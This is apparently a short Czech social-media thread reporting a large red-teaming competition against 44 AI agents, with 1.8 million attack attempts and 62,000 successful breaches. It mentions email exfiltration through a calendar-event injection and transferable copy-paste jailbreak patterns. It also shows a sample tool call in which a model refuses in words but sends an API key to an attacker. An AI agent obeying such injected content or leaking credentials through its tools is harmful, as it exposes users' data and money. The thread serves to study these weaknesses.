Nasadili jsme 44 AI agentů a nabídli internetu 170 tisíc dolarů za to, že na ně zaútočí. 1,8 milionu pokusů, 62 tisíc úniků, včetně úniku dat a finanční ztráty. 🚨 Znepokojivé je, že stejné exploity se přenášejí na živé produkční agenty... (Příklad: exfiltrace e-mailů prostřednictvím události kalendáře) 🧵
Mnoho breaků je univerzálních a přenosných. Vzory pro kopírování a vkládání fungovaly napříč úkoly, modely a mantinely. Pokud dnes rozbije jednoho agenta, pravděpodobně rozbije i toho vašeho.
Oblíbené selhání: "Odmítněte v textu, jednejte v nástrojích." 😈 Model: "Nemohu sdílet přihlašovací údaje." Pak: send_email(to=útočník, body="API_KEY=****") Uživatelské rozhraní vypadá bezpečně; Vrstva nástrojů způsobuje poškození.
466,6K